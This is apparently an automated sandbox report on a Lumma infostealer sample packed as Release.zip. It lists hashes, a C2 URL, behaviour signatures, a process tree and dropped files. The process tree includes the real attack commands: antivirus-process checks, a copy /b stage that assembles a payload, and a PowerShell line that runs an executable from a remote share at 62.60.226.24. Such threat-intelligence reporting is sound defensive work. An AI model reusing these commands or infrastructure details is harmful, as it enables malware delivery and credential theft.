Analysis

  • max time kernel
    48s
  • max time network
    105s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 13:06

General

  • Target

    Release.zip

  • Size

    29.6MB

  • MD5

    9220681474c92d9b93fbfbae86e0fa7e

  • SHA1

    87fd1dd9b5f768470bbde35ae0338e00f82d49f5

  • SHA256

    489e6280f29987758b82c942f5313d1f94b9650957bec37a42c17b08052b097f

  • SHA512

    fdd51ce5fd978c78da29b2c64cf1ae18a3e788340fdea20b570d5e44e70fbf77a7a3b4fb20bb44debf175be47d4156086be0439b7cbb0d286529fb19958cc501

  • SSDEEP

    786432:3SVZYXn/T5tL4X/9qKsWHgBcTH2ehK78YoErYjmeM:3SzknrTL4X/5ABcTpxmMmF

Malware Config

Extracted

Family

lumma

C2

https://brendon-sharjen.biz/api

Extracted

Family

lumma

C2

https://brendon-sharjen.biz/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 10 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Release.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1092
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3580
    • C:\Users\Admin\Desktop\v1.1.0\NewI[Upd v1.1.0].exe
      "C:\Users\Admin\Desktop\v1.1.0\NewI[Upd v1.1.0].exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c move Sporting Sporting.cmd & Sporting.cmd
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5044
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
        • C:\Windows\SysWOW64\findstr.exe
          findstr /I "opssvc wrsa"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4432
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4864
        • C:\Windows\SysWOW64\findstr.exe
          findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3936
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c md 306780
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4064
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V "wallpapers" Broken
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3268
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c copy /b ..\Nhs + ..\Opposed + ..\Mighty + ..\Pee + ..\Exact + ..\Cheese g
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4380
        • C:\Users\Admin\AppData\Local\Temp\306780\Thus.com
          Thus.com g
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:8
        • C:\Windows\SysWOW64\choice.exe
          choice /d y /t 5
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\62.60.226.24@80\file\'"; Start-Sleep -Seconds 4; Stop-Process -Name explorer; \\62.60.226.24@80\file\ModelsPreservation.exe
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4232
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" \\62.60.226.24@80\file\
        2⤵
          PID:1948
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:3056
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:940
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:232
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2392
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3460
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:4084
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:3344
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SendNotifyMessage
        PID:2480
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:740
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:2560
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        PID:1008
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious use of SetWindowsHookEx
        PID:4828
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2464
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
          PID:4312
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
            PID:2904
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:4048
            • C:\Windows\explorer.exe
              explorer.exe
              1⤵
                PID:1868
              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                1⤵
                  PID:2636
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                    PID:4268
                  • C:\Windows\explorer.exe
                    explorer.exe
                    1⤵
                      PID:4204
                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                      1⤵
                        PID:1828
                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                        1⤵
                          PID:4784
                        • C:\Windows\explorer.exe
                          explorer.exe
                          1⤵
                            PID:2940
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                              PID:1144
                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                              1⤵
                                PID:4876
                              • C:\Windows\explorer.exe
                                explorer.exe
                                1⤵
                                  PID:3900
                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                  1⤵
                                    PID:988
                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                    1⤵
                                      PID:4296
                                    • C:\Windows\explorer.exe
                                      explorer.exe
                                      1⤵
                                        PID:3192
                                        • C:\Windows\system32\taskmgr.exe
                                          "C:\Windows\system32\taskmgr.exe" /4
                                          2⤵
                                            PID:3700
                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                          1⤵
                                            PID:2200
                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                            1⤵
                                              PID:1704
                                            • C:\Windows\explorer.exe
                                              explorer.exe
                                              1⤵
                                                PID:624
                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                1⤵
                                                  PID:3928
                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                  1⤵
                                                    PID:4252
                                                  • C:\Windows\explorer.exe
                                                    explorer.exe
                                                    1⤵
                                                      PID:1364
                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                      1⤵
                                                        PID:1828
                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                        1⤵
                                                          PID:5060
                                                        • C:\Windows\explorer.exe
                                                          explorer.exe
                                                          1⤵
                                                            PID:3088
                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                            1⤵
                                                              PID:3816
                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                              1⤵
                                                                PID:4828
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe
                                                                1⤵
                                                                  PID:4348
                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                  1⤵
                                                                    PID:3824
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                    1⤵
                                                                      PID:3356
                                                                    • C:\Windows\explorer.exe
                                                                      explorer.exe
                                                                      1⤵
                                                                        PID:2220
                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                        1⤵
                                                                          PID:3472
                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                          1⤵
                                                                            PID:1812

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                            Filesize

                                                                            471B

                                                                            MD5

                                                                            1ba95f12a21856097150e0726c2eac07

                                                                            SHA1

                                                                            c0b827eedeceb4012a7a1fc91d17bc55c47698f0

                                                                            SHA256

                                                                            6906353cdf361ab0b6681dedaa63d43853d16a5c0bca127a30e8c5a84e3c17f6

                                                                            SHA512

                                                                            c6673be94bacdafc020927e792dabea809bf51841baa3d1982c99a2b28d3e607ac9c38c11848bd2e40ce5f4c8e3a989264aec48d3216910114696de5f9d7f8ea

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                            Filesize

                                                                            412B

                                                                            MD5

                                                                            22daeb68295113f35b4b634299832e47

                                                                            SHA1

                                                                            bcd0d0b1e6351b0b59f28a12fdcd4f65a552b584

                                                                            SHA256

                                                                            e1577617876ba2e0f6d6e884bf598ad281e40da32e6e7c72a735d1a9bc4c5ca3

                                                                            SHA512

                                                                            84b3ef29e48c8bb1be21c1ab5d11a48f822e556fe3bc4354a5ccc93746000c9b2ef6f928f397132c7f68e15016887767e44261142d9cc37df597e504f95bbde4

                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            dd27fbcfe7539e1cf5e41931dc77cb94

                                                                            SHA1

                                                                            e26b23c45a6a42451834c30013fb38f4d2bcc86a

                                                                            SHA256

                                                                            7c233b2b668ba77c04476ddc3b90345c5933d9ba7bbb65216a8eadc66d64c984

                                                                            SHA512

                                                                            e6f98133e0ea6012fd39078edd2cb391f8054bf9cc1d054ddd1d574396776a435a9d3585044264bc7db6a444485a96b9fc230ce483015d8531ac7cd2e74be560

                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\LLDJA3WI\microsoft.windows[1].xml

                                                                            Filesize

                                                                            97B

                                                                            MD5

                                                                            372706547a804b876522fe741dbfc040

                                                                            SHA1

                                                                            9bca733d6804f24c6841ef02b52e8ade1b45d7e4

                                                                            SHA256

                                                                            09fe1eb66c953d75dc66ff6df9237cde5f419fb25fab6327de9cde6676219651

                                                                            SHA512

                                                                            cc8057de048bf5646e41bed6f01111328bceae9abb4282a4ee1be635d086b6b3647cb5cc17cc3564980e5e31342a767dc639e536edbd3720df6b35ac7ebce34a

                                                                          • C:\Users\Admin\AppData\Local\Temp\306780\Thus.com

                                                                            Filesize

                                                                            925KB

                                                                            MD5

                                                                            62d09f076e6e0240548c2f837536a46a

                                                                            SHA1

                                                                            26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

                                                                            SHA256

                                                                            1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

                                                                            SHA512

                                                                            32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

                                                                          • C:\Users\Admin\AppData\Local\Temp\306780\g

                                                                            Filesize

                                                                            449KB

                                                                            MD5

                                                                            a60d9db58e543ec3c28b130d0e34308f

                                                                            SHA1

                                                                            b29a076831af6aa97b78aac211cc02ead3c08c5e

                                                                            SHA256

                                                                            8fd5f42b71fac0fd4dce26dd66f12d866ad57449dec6630bc7aac9e86d32b138

                                                                            SHA512

                                                                            1299907f67fad3e275afa5352aaec5775594ce180d48bf4c96227a85e9c3e0515a6039dcaf14d81bd0da0ae661d863b56178ee3cf0a1e78abcbfdd4acf052b31

                                                                          • C:\Users\Admin\AppData\Local\Temp\Adam

                                                                            Filesize

                                                                            93KB

                                                                            MD5

                                                                            86fbe2f2ca2062a4d20c0b1fd379f884

                                                                            SHA1

                                                                            62cc1eb1ca9a881605e9b2a7a696e063dfa1cfd8

                                                                            SHA256

                                                                            c65a8df4f832013787e2123c5707ebe7ed962bba704c443ad991386f2fca0d28

                                                                            SHA512

                                                                            908cdfcb7cbdd0421957c08e28a73b2f0078fef6c706d2da49c3e81d61e11b0b838bcb6444035511d953aa81bc85438ca510004ca08417f23378822bcfcfd377

                                                                          • C:\Users\Admin\AppData\Local\Temp\Apartments

                                                                            Filesize

                                                                            145KB

                                                                            MD5

                                                                            8bdab09194bcf5d66620dd1a9facf894

                                                                            SHA1

                                                                            62a3113668523bfa38697b7a9c7c3f1059636da2

                                                                            SHA256

                                                                            2faff363e0710d0161c0c12be67745077ca3e7217828b44b638c84550e3039b3

                                                                            SHA512

                                                                            bcd38580bb353c47baeac34ca46b04ff269540a910ce1b88fe05fbfa42f8c7accc098eb9c19cf1ac8408af8c9691296185b88afb631db4b66b08b43f700ed3fa

                                                                          • C:\Users\Admin\AppData\Local\Temp\Broken

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            8eccc8f820616ce78209b17cd49dcae2

                                                                            SHA1

                                                                            b3a50baee8bb942e58541d08f0b46f8d970ee211

                                                                            SHA256

                                                                            228304a12f8d53a4412189e7daeb36e91152a559dd5771f8e759671613a72cde

                                                                            SHA512

                                                                            94f807098de485976d84e0f2ed910f1dc5a00e0f237e573b68e8c5b3a83f34375e9b221aa9c91ae363fd8e825ba95676ed2e82d17881c71b7079c568decc36bb

                                                                          • C:\Users\Admin\AppData\Local\Temp\Cashiers

                                                                            Filesize

                                                                            109KB

                                                                            MD5

                                                                            626544db47deb510641ff5765d07c448

                                                                            SHA1

                                                                            79d0e2db7c3cc534b79bc04200c0a08e5e21b8a7

                                                                            SHA256

                                                                            f3ad3199ac7c32bbbc38f24aa0ad7b5b3e44faf78f07d252c8a82225c0c3e9eb

                                                                            SHA512

                                                                            2cc3f6689ca0ada299e59d560c54e677bf85380d48cf99faf5ac3f564780e3fa10d12cc0968cc45a8820c2e3f8cecd6be07cf90e8b02162fd3d5670649f72087

                                                                          • C:\Users\Admin\AppData\Local\Temp\Cheese

                                                                            Filesize

                                                                            72KB

                                                                            MD5

                                                                            71291cdb1457619c224b2bdf8f947ea0

                                                                            SHA1

                                                                            991208f16a6a57db3e7cbea6c0303ec8e44974b1

                                                                            SHA256

                                                                            20bd748fb58ea8ab9777dadb1a7bb337574fab69d6fd3856a04a0d423788d950

                                                                            SHA512

                                                                            59913c6d3709b6eaad3a218f9bfa5d36a9064056985f118a4ccd71e20e3571dcab584692242cdbbb24e2bff698387cbff064201d4afa67dc0619d7b049898f7c

                                                                          • C:\Users\Admin\AppData\Local\Temp\Exact

                                                                            Filesize

                                                                            77KB

                                                                            MD5

                                                                            82c5ab2baf653ddc124963ff8703e05b

                                                                            SHA1

                                                                            20cd128c297382976bd4e471f5136a92a32eae84

                                                                            SHA256

                                                                            a212cb65191970f32c7f94f2ed7b63fdc2cb71c59dd89ab68462156eb99c266c

                                                                            SHA512

                                                                            e723cd3ceeef6304d362c2fbe69554f9fcdb94d867055b70503ad3f9f3b85933fd2310e23ceae1779704d1a8be3b6404588bf9b38ef65a3acdd651725821df53

                                                                          • C:\Users\Admin\AppData\Local\Temp\Expert

                                                                            Filesize

                                                                            142KB

                                                                            MD5

                                                                            41bec8b99d97b29ab8486dbd90b8c18d

                                                                            SHA1

                                                                            db062dd94c07aaf03828a22a7ae37b8d3d5a283b

                                                                            SHA256

                                                                            5ab707f4a01a1425155d60220c81c4c6b9bf192c6fd00666f8250c4d374c489d

                                                                            SHA512

                                                                            9c253ca61a60a3367929a34e4f972ced06e7264a1054e355ce3efbfb5349b04881a91d3239850babfc041c487a7cf460fe8b142528caa64a9e3d27c80a6e311e

                                                                          • C:\Users\Admin\AppData\Local\Temp\Lie

                                                                            Filesize

                                                                            104KB

                                                                            MD5

                                                                            5117ff8a6f809d8f8022230a76bf51d8

                                                                            SHA1

                                                                            f8d427a45d409e9a221dfa1836336dab89aa4b70

                                                                            SHA256

                                                                            96dd8c9f9a3a47c26ebc7ed191cce55b2d819bd1110d2b20c0f99f97e2f9d758

                                                                            SHA512

                                                                            c709bf9dcc5618e092a4eb01e8b3584b09e67cd5979ea6f45465ff10fb3f956abb9c71cfe640c91dccc13d7f7aeba192af79d7a00d6c6f76dd8d4a8887964b3c

                                                                          • C:\Users\Admin\AppData\Local\Temp\Mighty

                                                                            Filesize

                                                                            64KB

                                                                            MD5

                                                                            f82466887a60c7ebbc36d971845de219

                                                                            SHA1

                                                                            12bda8e847c18f3f3e2dbd952078bd76e5c59118

                                                                            SHA256

                                                                            eb30343fcdce51976e366bbb34ece5d23bc41379304b061240fca88453c73ab1

                                                                            SHA512

                                                                            91814002dcfaebb129cd5ff669c95fa1b5a66e6f1ddb741f31d6e14a364d0f70727426267450d66811eab977d086b743e05f6392dc49261ebb4e845347cfb993

                                                                          • C:\Users\Admin\AppData\Local\Temp\Nhs

                                                                            Filesize

                                                                            93KB

                                                                            MD5

                                                                            99a70b64293c43cdc840af3c54583f47

                                                                            SHA1

                                                                            3b95bc8d825ffbb3c07721cf0f50275ed5abdab1

                                                                            SHA256

                                                                            79a7da521ea3f175a40553d569a3318d80d358da388866f710a8d6debeaaec0f

                                                                            SHA512

                                                                            bb7e70271f57114cdad66f4f2435e0f4c65cb0e20f3b2e864a78f1d6a34b571fd142dc70e899a51797ea1321e1565b3cfb726440a7434de9ca156215bf616989

                                                                          • C:\Users\Admin\AppData\Local\Temp\Opposed

                                                                            Filesize

                                                                            75KB

                                                                            MD5

                                                                            7f30991fcc979b0c2880ca2b1cc7ac86

                                                                            SHA1

                                                                            f2f7272c202c43f3ea50c7df06c860d9408d0969

                                                                            SHA256

                                                                            77ef860123e7c9f530d64724820edf34c19a3d3e705f5061a8691b03c12ec120

                                                                            SHA512

                                                                            8369a8a5c45e6963b2ff0afaffe597a17191326ea5ea37e0ba1f24148a909ac769023b2bc9eecd09c6304b339d9dc63aacc07f4f48d16276ae8a3d776c5d6ffd

                                                                          • C:\Users\Admin\AppData\Local\Temp\Pee

                                                                            Filesize

                                                                            68KB

